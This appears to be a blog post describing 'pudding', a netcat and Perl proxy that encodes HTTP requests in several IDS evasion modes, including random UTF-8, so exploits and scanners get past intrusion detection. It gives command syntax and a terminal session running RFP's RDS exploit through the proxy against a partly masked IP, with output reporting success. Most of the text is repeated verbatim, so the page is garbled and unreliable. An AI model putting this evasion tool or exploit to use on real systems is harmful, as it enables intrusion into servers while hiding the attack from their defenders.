Some time after I wrote the doc the Unicode bug struck. I got working on
UTF8 encoding, and decided to write a tool that would randomly encode each
character in a GET request. I proved to be VERY effective against IDS-es.
Here is an extract from the pudding docs:
I always wanted a tool that will save me the time to recode a HTTP exploit or
scanner to use a certain IDS evasion method. Its fine to see that whisker's IDS
evasion method 1 (hex encoding) works to bypass a certain IDS, but now you
still have to recode your exploit's HTTP request in hex.
I wanted a type of proxy that will encode the HTTP request for ANY scanner or
exploit. Pudding is such a tool. It supports most of RFP's IDS evasion encoding
methods, and I have added random UTF-8 encoding support.
Practically it works like this:
[exploit]--not encoded-->[(nc)-proxy]--encoded-->IDS -->[target]
Parameters for the proxy is as follows:
./pudding listenport:targetIP:targetport:mode
After execution, pudding will use netcat (nc) to listen on port <listenport>.
When a connection is made it will execute the PERL script stealth.pl. According
to the <mode> parameter, stealth.pl will encode the request and send it to
<targetIP> on <targetport>. The reply will be sent via the PERL script back to
netcat and thus back to the exploit or scanner.
Encoding methods that pudding do:
mode 0 clear (no encoding) for testing
mode 1 all UPPERCASE
mode 2 hex encoding
mode 3 /./ directory insertion
mode 4 fake parameter
mode 5 premature URL ending
mode 6 windows delimeter
mode 7 random UTF8 encoding
(see RFP's documentation on whisker's IDS evasion methods - I butchered it from
there anyway)
Multiple connections
--------------------
As browsers and scanners (and some exploits) use multiple connections, pudding
needs to fork for each request. PERL is not as fast as C, and therefor you will
need to start a few instances of pudding for programs that needs multiple
connections (think of Apache and Squid that fire up a few children to handle
the load - same thing here).
Let us look at an example:
--------------------------
(lets use RFP's popular RDS exploit with random UTF-8 encoding)
# ./pudding 80:160.xxx.xxx.98:80:7 &
[1] 23689
# ./pudding 80:160.xxx.xxx.98:80:7 &
[2] 23697
# ./pudding 80:160.xxx.xxx.98:80:7 &
[3] 23705
# perl rfp.orig.pl -h 127.0.0.1
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c echo
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: e: f: g: h:
winnt35 -> c: d: e: f: g: h:
winnt351 -> c: d: e: f: g: h:
win -> c: d: e: f: g: h:
windows -> c: d: e: f: g: h:
Step 2: Trying to make our own DSN...
Making DSN: c: <<fail>>
Step 3: Trying known DSNs.....AdvWorks: Success!
UTF8 encoding, and decided to write a tool that would randomly encode each
character in a GET request. I proved to be VERY effective against IDS-es.
Here is an extract from the pudding docs:
I always wanted a tool that will save me the time to recode a HTTP exploit or
scanner to use a certain IDS evasion method. Its fine to see that whisker's IDS
evasion method 1 (hex encoding) works to bypass a certain IDS, but now you
still have to recode your exploit's HTTP request in hex.
I wanted a type of proxy that will encode the HTTP request for ANY scanner or
exploit. Pudding is such a tool. It supports most of RFP's IDS evasion encoding
methods, and I have added random UTF-8 encoding support.
Practically it works like this:
[exploit]--not encoded-->[(nc)-proxy]--encoded-->IDS -->[target]
Parameters for the proxy is as follows:
./pudding listenport:targetIP:targetport:mode
After execution, pudding will use netcat (nc) to listen on port <listenport>.
When a connection is made it will execute the PERL script stealth.pl. According
to the <mode> parameter, stealth.pl will encode the request and send it to
<targetIP> on <targetport>. The reply will be sent via the PERL script back to
netcat and thus back to the exploit or scanner.
Encoding methods that pudding do:
mode 0 clear (no encoding) for testing
mode 1 all UPPERCASE
mode 2 hex encoding
mode 3 /./ directory insertion
mode 4 fake parameter
mode 5 premature URL ending
mode 6 windows delimeter
mode 7 random UTF8 encoding
(see RFP's documentation on whisker's IDS evasion methods - I butchered it from
there anyway)
Multiple connections
--------------------
As browsers and scanners (and some exploits) use multiple connections, pudding
needs to fork for each request. PERL is not as fast as C, and therefor you will
need to start a few instances of pudding for programs that needs multiple
connections (think of Apache and Squid that fire up a few children to handle
the load - same thing here).
Let us look at an example:
--------------------------
(lets use RFP's popular RDS exploit with random UTF-8 encoding)
# ./pudding 80:160.xxx.xxx.98:80:7 &
[1] 23689
# ./pudding 80:160.xxx.xxx.98:80:7 &
[2] 23697
# ./pudding 80:160.xxx.xxx.98:80:7 &
[3] 23705
# perl rfp.orig.pl -h 127.0.0.1
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c echo
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: e: f: g: h:
winnt35 -> c: d: e: f: g: h:
winnt351 -> c: d: e: f: g: h:
win -> c: d: e: f: g: h:
windows -> c: d: e: f: g: h:
Step 2: Trying to make our own DSN...
Making DSN: c: <<fail>>
Step 3: Trying known DSNs.....AdvWorks: Success!
No comments:
Post a Comment